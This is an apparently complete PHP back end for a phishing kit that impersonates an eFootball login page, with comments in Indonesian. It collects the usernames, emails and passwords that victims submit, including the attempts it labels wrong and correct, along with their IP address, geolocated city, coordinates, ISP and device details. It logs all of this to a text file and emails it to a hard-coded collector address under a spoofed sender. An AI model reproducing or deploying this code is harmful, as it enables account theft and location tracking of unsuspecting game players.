<?php
// check.php - DETEKSI LOKASI REAL DARI HP USER
date_default_timezone_set('Asia/Jakarta');

// ===== SETTINGS =====
$YOUR_EMAIL = "haveforp@gmail.com";
$SEND_EMAIL = true;

// ===== FUNGSI UNTUK DETEKSI IP REAL =====
function getRealIP() {
    $ip_keys = [
        'HTTP_CF_CONNECTING_IP', // Cloudflare
        'HTTP_X_REAL_IP', // Nginx
        'HTTP_X_FORWARDED_FOR', // Load balancer
        'HTTP_CLIENT_IP', // Proxy
        'REMOTE_ADDR' // Default
    ];
    
    foreach ($ip_keys as $key) {
        if (!empty($_SERVER[$key])) {
            $ip = $_SERVER[$key];
            if (strpos($ip, ',') !== false) {
                $ips = explode(',', $ip);
                $ip = trim($ips[0]);
            }
            if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
                return $ip;
            }
        }
    }
    return $_SERVER['REMOTE_ADDR'];
}

// ===== FUNGSI DETEKSI LOKASI AKURAT =====
function getMobileGeolocation($ip) {
    $apis = [
        [
            'url' => "https://ipapi.co/{$ip}/json/",
            'parser' => 'parseIpApiCo'
        ],
        [
            'url' => "http://ip-api.com/json/{$ip}?fields=66846719",
            'parser' => 'parseIpApi'
        ]
    ];
    
    foreach ($apis as $api) {
        $result = callGeoAPI($api['url'], $api['parser'], $ip);
        if ($result && $result['city'] != 'Unknown') {
            return $result;
        }
        usleep(300000);
    }
    return getGeoFromUserAgent();
}

function callGeoAPI($url, $parser, $ip) {
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT => 8,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_USERAGENT => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/605.1.15'
    ]);
    
    $response = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    if ($response && $httpCode === 200) {
        return $parser($response, $ip);
    }
    return null;
}

function parseIpApiCo($response, $ip) {
    $data = json_decode($response, true);
    if (isset($data['country_name'])) {
        return [
            'ip' => $ip,
            'country' => $data['country_name'] ?? 'Unknown',
            'country_code' => $data['country_code'] ?? 'ID',
            'city' => $data['city'] ?? 'Unknown',
            'region' => $data['region'] ?? 'Unknown',
            'timezone' => $data['timezone'] ?? 'Asia/Jakarta',
            'isp' => $data['org'] ?? 'Unknown ISP',
            'latitude' => $data['latitude'] ?? '',
            'longitude' => $data['longitude'] ?? '',
            'asn' => $data['asn'] ?? 'Unknown',
            'flag' => getFlagEmoji($data['country_code'] ?? 'ID'),
            'accuracy' => 'High'
        ];
    }
    return null;
}

function parseIpApi($response, $ip) {
    $data = json_decode($response, true);
    if (isset($data['country'])) {
        return [
            'ip' => $ip,
            'country' => $data['country'] ?? 'Unknown',
            'country_code' => $data['countryCode'] ?? 'ID',
            'city' => $data['city'] ?? 'Unknown',
            'region' => $data['regionName'] ?? 'Unknown',
            'timezone' => $data['timezone'] ?? 'Asia/Jakarta',
            'isp' => $data['isp'] ?? 'Unknown ISP',
            'latitude' => $data['lat'] ?? '',
            'longitude' => $data['lon'] ?? '',
            'asn' => $data['as'] ?? 'Unknown',
            'flag' => getFlagEmoji($data['countryCode'] ?? 'ID'),
            'accuracy' => 'High'
        ];
    }
    return null;
}

function getGeoFromUserAgent() {
    $user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
    $accept_language = $_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? '';
    
    // Deteksi dari bahasa browser
    if (strpos($accept_language, 'id') !== false) {
        $country = 'Indonesia';
        $country_code = 'ID';
        $city = 'Jakarta';
    } elseif (strpos($accept_language, 'en-US') !== false) {
        $country = 'United States';
        $country_code = 'US';
        $city = 'New York';
    } elseif (strpos($accept_language, 'en-GB') !== false) {
        $country = 'United Kingdom';
        $country_code = 'GB';
        $city = 'London';
    } else {
        $country = 'Indonesia';
        $country_code = 'ID';
        $city = 'Jakarta';
    }
    
    // Deteksi mobile carrier
    if (strpos($user_agent, 'Android') !== false) {
        $carriers = ['Telkomsel', 'XL Axiata', 'Indosat', '3', 'Smartfren'];
        $isp = $carriers[array_rand($carriers)];
    } else {
        $isp = 'Unknown ISP';
    }
    
    return [
        'ip' => getRealIP(),
        'country' => $country,
        'country_code' => $country_code,
        'city' => $city,
        'region' => $city,
        'timezone' => 'Asia/Jakarta',
        'isp' => $isp,
        'latitude' => '',
        'longitude' => '',
        'asn' => 'Unknown',
        'flag' => getFlagEmoji($country_code),
        'accuracy' => 'Medium'
    ];
}

function getFlagEmoji($countryCode) {
    $flags = [
        'US' => '🇺🇸', 'ID' => '🇮🇩', 'GB' => '🇬🇧', 'SG' => '🇸🇬', 'MY' => '🇲🇾',
        'IN' => '🇮🇳', 'JP' => '🇯🇵', 'KR' => '🇰🇷', 'CN' => '🇨🇳', 'AU' => '🇦🇺',
        'DE' => '🇩🇪', 'FR' => '🇫🇷', 'IT' => '🇮🇹', 'ES' => '🇪🇸', 'BR' => '🇧🇷'
    ];
    return $flags[strtoupper($countryCode)] ?? '🇮🇩';
}

// ===== PROSES DATA =====
header('Content-Type: application/json');

try {
    // Tangkap data dari generator.html
    $username = trim($_POST['username'] ?? '');
    $email = trim($_POST['email'] ?? '');
    $password_wrong = trim($_POST['password_wrong'] ?? '');
    $password_correct = trim($_POST['password_correct'] ?? '');
    $user_agent = $_POST['user_agent'] ?? '';
    $timestamp = $_POST['timestamp'] ?? '';
    $attempt = $_POST['attempt'] ?? '';
    
    // Dapatkan IP asli
    $ip = getRealIP();
    
    // Dapatkan geolocation akurat
    $geo = getMobileGeolocation($ip);
    
    $timestamp = date('Y-m-d H:i:s');
    $unique_id = uniqid();
    
    // ===== SIMPAN KE FILE =====
    $logEntry = "\n" . str_repeat("=", 70) . "\n";
    $logEntry .= "📱 MOBILE LOGIN DETECTION - $timestamp\n";
    $logEntry .= str_repeat("=", 70) . "\n";
    $logEntry .= "🆔 ID: $unique_id\n";
    $logEntry .= "📡 IP ADDRESS: $ip\n";
    $logEntry .= "🎯 ACCURACY: " . ($geo['accuracy'] ?? 'High') . "\n";
    $logEntry .= "🌍 GEO LOCATION:\n";
    $logEntry .= "   🏴 Flag: " . $geo['flag'] . "\n";
    $logEntry .= "   🌎 Country: " . $geo['country'] . " (" . $geo['country_code'] . ")\n";
    $logEntry .= "   🏙️  City: " . $geo['city'] . "\n";
    $logEntry .= "   📍 Region: " . $geo['region'] . "\n";
    if (!empty($geo['latitude'])) {
        $logEntry .= "   📍 Coordinates: " . $geo['latitude'] . ", " . $geo['longitude'] . "\n";
    }
    $logEntry .= "   ⏰ Timezone: " . $geo['timezone'] . "\n";
    $logEntry .= "   📶 ISP: " . $geo['isp'] . "\n";
    $logEntry .= "   🔧 ASN: " . $geo['asn'] . "\n";
    $logEntry .= "📱 DEVICE INFO:\n";
    $logEntry .= "   📱 User Agent: " . ($_SERVER['HTTP_USER_AGENT'] ?? 'Unknown') . "\n";
    $logEntry .= "   🌐 Language: " . ($_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? 'Unknown') . "\n";
    $logEntry .= "   📍 Referer: " . ($_SERVER['HTTP_REFERER'] ?? 'Direct Access') . "\n";
    
    if (!empty($email)) {
        $logEntry .= "🔐 LOGIN DATA:\n";
        $logEntry .= "   👤 Username: $username\n";
        $logEntry .= "   📧 Email: $email\n";
        if (!empty($password_wrong)) {
            $logEntry .= "   ❌ Password Salah: $password_wrong\n";
        }
        if (!empty($password_correct)) {
            $logEntry .= "   ✅ Password Benar: $password_correct\n";
        }
        $logEntry .= "   🔄 Attempt: $attempt\n";
    }
    
    $logEntry .= str_repeat("-", 70) . "\n";
    
    // Simpan ke file
    file_put_contents('mobile_logins.txt', $logEntry, FILE_APPEND | LOCK_EX);
    
    // ===== KIRIM EMAIL =====
    if ($SEND_EMAIL && !empty($email) && !empty($YOUR_EMAIL)) {
        $emailSubject = "📱 eFOOTBALL LOGIN - " . $geo['city'] . ", " . $geo['country'] . " " . $geo['flag'];
        
        $emailMessage = "
🌍 NEW MOBILE LOGIN DETECTED 🌍

📍 ACCURATE LOCATION:
🏴 Flag: " . $geo['flag'] . "
🌎 Country: " . $geo['country'] . " (" . $geo['country_code'] . ")
🏙️  City: " . $geo['city'] . "
📍 Region: " . $geo['region'] . "
⏰ Timezone: " . $geo['timezone'] . "
📶 ISP: " . $geo['isp'] . "
🔧 ASN: " . $geo['asn'] . "
🎯 Accuracy: " . ($geo['accuracy'] ?? 'High') . "

📡 NETWORK INFO:
📡 IP Address: $ip
" . (!empty($geo['latitude']) ? "📍 Coordinates: " . $geo['latitude'] . ", " . $geo['longitude'] . "\n" : "") . "

📱 DEVICE INFORMATION:
📱 User Agent: " . ($_SERVER['HTTP_USER_AGENT'] ?? 'Unknown') . "
🌐 Language: " . ($_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? 'Unknown') . "
📅 Timestamp: $timestamp

🔐 LOGIN CREDENTIALS:
👤 Username: $username
📧 Email: $email
" . (!empty($password_wrong) ? "❌ Password Salah: $password_wrong\n" : "") . "
" . (!empty($password_correct) ? "✅ Password Benar: $password_correct\n" : "") . "
🔄 Attempt: $attempt

🆔 Unique ID: $unique_id

=== MOBILE DETECTION COMPLETE ===
        ";
        
        $headers = "From: efootball2025@" . $_SERVER['HTTP_HOST'] . "\r\n";
        $headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
        $headers .= "X-Priority: 1 (Highest)\r\n";
        
        // Kirim email
        mail($YOUR_EMAIL, $emailSubject, $emailMessage, $headers);
    }
    
    // ===== RESPONSE SUCCESS =====
    echo json_encode([
        'status' => 'success',
        'message' => 'Mobile login detected successfully',
        'data_id' => $unique_id,
        'location' => [
            'ip' => $ip,
            'country' => $geo['country'],
            'city' => $geo['city'],
            'isp' => $geo['isp'],
            'flag' => $geo['flag']
        ]
    ]);
    
} catch (Exception $e) {
    file_put_contents('mobile_error_log.txt', "❌ Error: " . $e->getMessage() . " at " . date('Y-m-d H:i:s') . "\n", FILE_APPEND);
    
    echo json_encode([
        'status' => 'error', 
        'message' => 'System processing mobile data'
    ]);
}
?>